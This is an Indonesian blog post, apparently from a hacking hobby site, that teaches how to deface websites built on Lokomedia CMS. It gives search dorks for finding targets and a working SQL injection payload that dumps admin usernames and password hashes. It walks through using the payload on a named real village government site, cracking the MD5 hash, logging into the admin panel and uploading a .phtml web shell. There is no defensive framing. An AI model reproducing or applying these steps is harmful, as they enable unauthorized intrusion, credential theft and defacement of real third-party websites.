Home » Uncategories » Tutorial Deface Dengan SQL Lokomedia

Tutorial Deface Dengan SQL Lokomedia

Selamat pagi semua :D pagi ini saya akan berbagi Tutorial Deface Dengan SQL Lokomedia :D Langsung Aja Cekidot..

Dork : - Inurl:kategori-23-hiburan.html
           - Inurl:hal-tentang-kami.html
           - Inurl:statis-1-pengantar.html
           - Inurl:statis-19-beasiswa.html
           - Inurl:statis-22-kerjasama.html
*Kembangin biar jos :v
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Pertama masukin dork di pencarian seperti Google dan Bing, Lalu pilih target sesuka kalian, kali ini target saya adalah http://desaponggok.id/ .



Kemudian masukan exploit sehingga menjadi seperti http://desaponggok.id/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html.



Sekarang sudah kelihatan user sama passwordnya di bagian title :v kemudian ctrl+u untuk melihatnya lebih jelas.



Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password admin.



Untuk login biasanya di :
- http://site/admin
- http://site/adminweb
- http://site/administrator
- http://site/redaktur
Kali ini loginnya berada di http://desaponggok.id/adminweb/
, Kemudian masukan user dan pass di form. Dan hasilnya seperti ini



Untuk mengupload shell bisa dibagian Download, seperti ini



Untuk mengakses shell biasanya di http://site/files/shellmu
*Shell harus berekstensi .phtml

Sekian dan terima kasih.
Share on Facebook
Share on Twitter
Share on Google+
Share on LinkedIn

Subscribe to receive free email updates:

0 Response to "Tutorial Deface Dengan SQL Lokomedia"

Post a Comment

Subscribe to: Post Comments (Atom)